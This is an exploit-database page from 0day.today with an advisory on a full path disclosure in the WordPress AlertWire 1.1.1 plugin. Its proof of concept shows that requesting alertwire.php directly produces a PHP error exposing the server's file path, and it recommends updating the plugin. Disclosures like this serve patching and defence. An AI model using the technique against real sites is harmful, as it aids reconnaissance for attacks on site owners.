[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress AlertWire 1.1.1 Plugin - Full Path Disclosure Vulnerability

Author
ZwX
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-24411
Category
web applications
Date add
11-10-2015
Platform
php
# Title : Wordpress Plugin AlertWire 1.1.1 - Full Path Disclosure Vulnerability
# Date : 17/12/2014
# Author : ZwX
# Download Link : https://wordpress.org/plugins/alertwire/
# Vendor : http://www.alertwire.com/
# Tested : Windows 7 

---------------------------------------
      Description Vulnerability
---------------------------------------

A vulnerability displays the full path to the vulnerable script while indicating the type of vulnerability:
register_activation_hook() . 

Vulnerability lies in the alertwire.php file

---------------------------------------
      Proof Of Concept (PoC)
---------------------------------------

# URL : http://127.0.0.1/wordpress/wp-content/plugins/alertwire/alertwire.php
# Results : Fatal error: Call to undefined function register_activation_hook()
  in C:\Program Files\EasyPHP-DevServer-14.1VC9\data\localweb\wordpress\wp-content\plugins\alertwire\alertwire.php on line 129

---------------------------------------
            Solution
---------------------------------------

# update the plugin AlertWire

#  0day.today [2024-10-06]  #